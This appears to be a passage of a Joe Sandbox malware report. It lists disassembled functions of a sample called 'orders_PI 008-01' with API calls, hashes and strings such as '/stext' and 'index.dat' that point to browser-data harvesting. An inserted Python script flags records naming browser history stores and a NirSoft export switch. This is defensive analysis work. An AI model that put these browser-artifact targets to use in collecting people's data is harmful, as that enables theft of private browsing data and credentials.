                                        • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                        • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID: *.*$index.dat
                                        • API String ID: 1974802433-2863569691
                                        • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                        • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                        • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                        • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                        • GetLastError.KERNEL32 ref: 004175A2
                                        • GetLastError.KERNEL32 ref: 004175A8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FilePointer
                                        • String ID:
                                        • API String ID: 1156039329-0
                                        • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                        • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                        • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                        • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                        • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                        • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                        • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                        • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                        • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Temp$DirectoryFileNamePathWindows
                                        • String ID:
                                        • API String ID: 1125800050-0
                                        • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                        • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                        • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                        • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                        APIs
                                        • Sleep.KERNEL32(00000064), ref: 004175D0
                                        • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseHandleSleep
                                        • String ID: }A
                                        • API String ID: 252777609-2138825249
                                        • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                        • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                        • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                        • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                        APIs
                                        • malloc.MSVCRT ref: 00409A10
                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                        • free.MSVCRT ref: 00409A31
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID:
                                        • API String ID: 3056473165-0
                                        • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                        • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                        • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                        • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                        • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                        • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                        • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: BINARY
                                        • API String ID: 2221118986-907554435
                                        • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                        • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                        • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                        • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /stext
                                        • API String ID: 2081463915-3817206916
                                        • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                        • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                        • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                        • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
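Several of the records above attribute browser data-store names to the dumped functions: history.dat and places.sqlite (the record with API ID memsetwcscatwcslen$free$AttributesFilememcpywcscpy), *.* and index.dat (the FileFindFirst record), and the /stext switch (the _wcsicmp record). The Python script below is an added example, not part of this report or of Joe Sandbox: it parses records in this layout into structured objects, keeps the call-site addresses and the subcall parent for each API line, and flags records whose String IDs name a browser artifact file or the NirSoft save-as-text switch. The embedded sample text is constructed from three of the records on this page, trimmed to the fields the parser reads; the table describing what each flagged string denotes is the example's own assumption, as is the set of file APIs it treats as breakpoint candidates.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample in the report's record layout: three of the records on
# this page, trimmed to the fields the parser reads.
SAMPLE = """\
APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
• Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
Strings
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• Opcode ID: 0d9359b71a36c6a5ae09cc3eb1ef66efc5ef5f63627713107dbdf360f7abf22a
• Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
Strings
• API ID: _wcsicmp
• String ID: /stext
• Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
"""

# API line: optional 'Part of subcall function XXXXXXXX:' prefix, Name.MODULE,
# optional (args), then 'ref: <call-site address>'.
API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
FIELD_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<key>API ID|String ID|Opcode ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$"
)
# Assumed meaning of the strings worth flagging (this example's own table).
BROWSER_ARTIFACTS: Dict[str, str] = {
    "places.sqlite": "Firefox history/bookmarks database",
    "history.dat": "legacy Mozilla/Firefox history file",
    "index.dat": "Internet Explorer history/cache index",
    "/stext": "NirSoft save-as-text switch (WebBrowserPassView and siblings)",
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                      # call-site address in the dump
    parent: Optional[str] = None  # set for 'Part of subcall function' entries

@dataclass
class FunctionRecord:
    opcode_id: str = ""
    api_ids: List[str] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    calls: List[ApiCall] = field(default_factory=list)

def parse_records(text: str) -> List[FunctionRecord]:
    """Accumulate lines into records; 'Instruction Fuzzy Hash' closes each one."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue                      # headings, dump-source lines, etc.
        key, val = f["key"], f["val"].strip()
        if key == "API ID":
            cur.api_ids = [v for v in val.split("$") if v]
        elif key == "String ID":
            cur.strings = [v for v in val.split("$") if v]
        elif key == "Opcode ID":
            cur.opcode_id = val
        else:                             # Instruction Fuzzy Hash
            records.append(cur)
            cur = FunctionRecord()
    return records

def triage(records: List[FunctionRecord]) -> List[Tuple[str, Dict[str, str], List[str]]]:
    """(opcode-id prefix, matched artifacts, API IDs) for records naming a browser store."""
    hits = []
    for r in records:
        matched = {s: BROWSER_ARTIFACTS[s] for s in r.strings if s in BROWSER_ARTIFACTS}
        if matched:
            hits.append((r.opcode_id[:12], matched, r.api_ids))
    return hits

def file_io_sites(records: List[FunctionRecord]) -> List[Tuple[str, str]]:
    """Direct (non-subcall) file-API call sites: breakpoint candidates when re-running the dump."""
    wanted = {"CreateFileW", "ReadFile", "SetFilePointer", "GetFileSize", "FindFirstFileW"}
    return sorted((c.ref, c.name) for r in records for c in r.calls
                  if c.name in wanted and c.parent is None)

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for hit in triage(recs):
        print(*hit)
    print(file_io_sites(recs))
```

Feed it the full function list of a report (the text between the first "APIs"/"Strings" heading and the last "Instruction Fuzzy Hash" line) and the triage output gives the Opcode IDs to open first in the dump; the "Part of subcall function" entries are kept but excluded from the breakpoint list so that each address is attributed to the function that actually issues the call.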
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: .Wu
                                        • API String ID: 2081463915-3424199868
                                        • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                        • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                        • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                        • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                        APIs
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                        • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 2445788494-0
                                        • Opcode ID: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                        • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                        • Opcode Fuzzy Hash: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                        • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                        APIs
                                        Strings
                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID: failed to allocate %u bytes of memory
                                        • API String ID: 2803490479-1168259600
                                        • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                        • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                        • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                        • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                        APIs
                                        • memset.MSVCRT ref: 0041BDDF
                                        • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmpmemset
                                        • String ID:
                                        • API String ID: 1065087418-0
                                        • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                        • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                        • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                        • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                        APIs
                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                        • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                        • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                          • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                          • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                        • String ID:
                                        • API String ID: 1381354015-0
                                        • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                        • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                        • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                        • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                        • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                        • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                        • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                        APIs
                                        • memset.MSVCRT ref: 004301AD
                                        • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID:
                                        • API String ID: 1297977491-0
                                        • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                        • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                        • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                        • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                        • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                        • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                        • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                        APIs
                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                          • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                          • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
